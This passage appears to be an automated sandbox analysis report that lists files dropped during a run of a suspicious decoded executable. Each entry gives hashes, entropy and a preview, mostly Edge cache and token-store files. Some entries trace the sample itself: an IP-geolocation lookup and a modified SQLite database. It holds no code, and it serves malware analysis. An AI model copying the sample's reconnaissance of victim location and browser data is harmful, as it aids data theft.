                                                                                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                                            MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                                            SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                                            SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                                            SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):57
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                                            MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                                            SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                                            SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                                            SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):29
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                                            MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                                            SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                                            SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                                            SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):575056
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                                                                                            SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                                            MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                                            SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                                            SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                                            SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):460992
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                                                                                            SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                                            MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                                            SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                                            SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                                            SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):9
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                                            MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                                            SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                                            SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                                            SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:uriCache_
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.01288062220155
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclTNF0YVn:YWLSGTt1o9LuLgfGBPAzkVj/T8loy
                                                                                                                                                                                                                                                                                                                            MD5:6F8A1D74EFE547C3C04CA71C264AE56D
                                                                                                                                                                                                                                                                                                                            SHA1:E1F4032F7FAABF39215B8C9AEC4669B76FAA4AB0
                                                                                                                                                                                                                                                                                                                            SHA-256:75D67D5BA92D6579376BCCFFAD9898D088ADC8650E249D413609F38A0D8244BC
                                                                                                                                                                                                                                                                                                                            SHA-512:AAB6928F0A7C4D8451D0263F90C6020E22F23305088CFF6111F5C51730A1AEAD8B4788E2744B55556762DBF13DFD51BADBAF3C6541E40440F007EFDE8CAFA3CE
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736163558559541}]}
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):85
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.3488360343066725
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQan:YQ3Kq9X0dMgAEiLIM
                                                                                                                                                                                                                                                                                                                            MD5:BC6142469CD7DADF107BE9AD87EA4753
                                                                                                                                                                                                                                                                                                                            SHA1:72A9AA05003FAB742B0E4DC4C5D9EDA6B9F7565C
                                                                                                                                                                                                                                                                                                                            SHA-256:B26DA4F8C7E283AA74386DA0229D66AF14A37986B8CA828E054FC932F68DD557
                                                                                                                                                                                                                                                                                                                            SHA-512:47D1A67A16F5DC6D50556C5296E65918F0A2FCAD0E8CEE5795B100FE8CD89EAF5E1FD67691E8A57AF3677883A5D8F104723B1901D11845B286474C8AC56F6182
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":0}
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):45000
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.095364056871153
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xWONi1zNtx8Mr9NxCbf+WKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yO6haKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                            MD5:AF4211D79185ECE197762B29D539D31B
                                                                                                                                                                                                                                                                                                                            SHA1:10EBFA35CCFE7CAEC18631C2078C421974F03801
                                                                                                                                                                                                                                                                                                                            SHA-256:D9CC4FC722CD90C2D96140A560E4C6F676D0CB9688B3ACD074856C1AF6ACC72C
                                                                                                                                                                                                                                                                                                                            SHA-512:BFB7E582C2A6531028D2632EBF12E99AB5C85F98DDA77849F7FF8D6C9A696CE734FEB49F1FE3ACD5C91107E3A176B774DC0D45C75E1BE7A3696DC7703EB63511
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2278
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.847643769911161
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:uiTrlKxrgxkyxl9Il8uxvawcztk1ECep9rY6d1rc:moYfaPkgDr8
                                                                                                                                                                                                                                                                                                                            MD5:22B6FA91B99C87EDE7E32F0ECF3A08B3
                                                                                                                                                                                                                                                                                                                            SHA1:C0E77EC53A10CA9A40A44FEDC51EBA2D55879D46
                                                                                                                                                                                                                                                                                                                            SHA-256:8701FC432D79E42D834A03169155B88AAB57D6BBC912A2347CB77F2012FEEFD6
                                                                                                                                                                                                                                                                                                                            SHA-512:9590DA803EBE3F987F58B30A095D932E3E5137605E3044422862E9054DD0DB755323669C8F96C0A8B62CD870E943CF2723507F81411321F3066E7F4863041A61
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.L./.+.T.k.1.f.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.I.O.j.4.D.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):4622
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.999838252466345
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:96:k7YnTpC2F1Yn74y4Fdb1M8EqJ43/+M90iRZ5cLgVmfZkrXBF6:GgTl3Y74yqKyJt6XNeZkbj6
                                                                                                                                                                                                                                                                                                                            MD5:C2C0E54AAF1835FBB550A441C4DC3B7D
                                                                                                                                                                                                                                                                                                                            SHA1:29D6D75AA2F0C5F2E93661A4895FA7C6A0988D40
                                                                                                                                                                                                                                                                                                                            SHA-256:7613FE524201717DFC2D557E8169D380C530E981760E47766D6EC35B278EDD36
                                                                                                                                                                                                                                                                                                                            SHA-512:BD3C5DE177EDAC287AF1057FA726390320518605F73DC0BDFB0D112676CD17CCF57B339245619AD38FD9FFBF079C334A4A98E152EB33470883C23CC38A6D6DAF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".e.R.P.v.N.E.V.f.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.I.O.j.4.D.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2684
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.9052384058489644
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:uiTrlKx68Wa7x3xl9Il8uJ0zepKF7X839Z+mSztTFhgrcjE5d/vc:aZYP0z1g9QmutArcjE4
                                                                                                                                                                                                                                                                                                                            MD5:611725D3DE453450BBBDA549C99004E5
                                                                                                                                                                                                                                                                                                                            SHA1:DEB8F478B726C584DDAA19B1C684E5E69728CA00
                                                                                                                                                                                                                                                                                                                            SHA-256:4EE868F7A9B29B0571983AE4BF34083A227E4611A1624FFC7D8DE11E7929A726
                                                                                                                                                                                                                                                                                                                            SHA-512:B83F2B8421ADE92DC4E44BB9B463D203A8AF53D4641A5E07642BAAF8CE4FEBA0D8D6CD15756FCE3B036DD05190E2D47A1CA61073C71B0412E8511BF0F51CC526
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".M.H.F.F.Z.R.Z.+.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.I.O.j.4.D.
                                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):963
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.019205124979377
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                                                                                                                                                            MD5:B62617530A8532F9AECAA939B6AB93BB
                                                                                                                                                                                                                                                                                                                            SHA1:E4DE9E9838052597EB2A5B363654C737BA1E6A66
                                                                                                                                                                                                                                                                                                                            SHA-256:508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
                                                                                                                                                                                                                                                                                                                            SHA-512:A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.04648285425008554
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:rymi0jLYiVWK+sBhF4S5PJTpRlakC2GXnSgDWT3h/ZNExIdVg1RQcGy36En8y08s:Gt0jjlTX38Ihx1gr13b08T2RGOD
                                                                                                                                                                                                                                                                                                                            MD5:8060C7279BFCE613E73FC9E126C01E88
                                                                                                                                                                                                                                                                                                                            SHA1:E287C6D327C5A8AAB78729E9E25402EBF94C62C8
                                                                                                                                                                                                                                                                                                                            SHA-256:FCDF62AF29A934CA0A54901AB095A9A354211D4DFAF1C832A808AA88E36E65DF
                                                                                                                                                                                                                                                                                                                            SHA-512:2BA1B567355A90F78ED6286D44F65974413C0DD66C492B21A434CC2E2F86E654C8121156B0CC8B8B2DE18A27D5C87E1FA3DA0934B8E50B7AA2A9F442BC24506C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):20
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.6219280948873624
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                                                                                                                                                                                                                                            MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                                                                                                                                                                                                                                            SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                                                                                                                                                                                                                                                                            SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                                                                                                                                                                                                                                            SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:level=none expiry=0.
                                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):30076
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.567669414159009
                                                                                                                                                                                                                                                                                                                            Encrypted:false
